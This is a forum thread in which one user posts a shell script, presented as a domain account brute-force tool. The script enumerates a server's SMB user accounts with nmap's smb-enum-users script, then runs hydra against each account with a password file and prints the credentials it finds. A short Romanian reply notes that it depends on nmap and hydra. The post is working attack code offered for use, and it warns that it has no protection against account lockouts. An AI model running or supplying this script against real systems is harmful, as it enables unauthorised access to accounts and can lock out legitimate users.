PuRiCeL Posted February 16, 2011 Report Posted February 16, 2011 #!/bin/shechoecho "*******************************************************"echo "* *"echo "* Welcome to the Domain Account Bruteforce Tool. *"echo "* By Sean gambles 21st Sep 2010 *"echo "*******************************************************"echoecho "This tool makes use of the nmap smb-enum-users script,"echo "by basically exporting the results, in a cleaned up form"echo "into hydra for bruteforcing."echoecho "Currently, only working with server 2000, 2003 family."echo "This is due to server 2008 not allowing unauthenticated"echo "account enumeration."echoecho "*** Please observe account lockout thresholds before"echo "submitting your password file into this tool, as there"echo "is no protection against lockouts taking place. ***"echoecho "Please enter the target server IP :"read targetecho "Please enter the path to your password file"echo "E.g /root/passwords.txt"read passfileecho "Enumerating users, please wait...."nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt#Cleans up the user list file by removing template accounts and computer names.cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txtrm /root/nmap-users.txtecho "Trying passwords against all the user accounts, please wait...."hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txtrm /root/users.txtecho "*********************************************************"echoecho "Domain accounts found :"echocat results.txt |grep login: |cut -d" " -f6-11 1 Quote
Zatarra Posted February 16, 2011 Report Posted February 16, 2011 Necesita nmap & hydra.. e doar un script, nu e cine stie ce Quote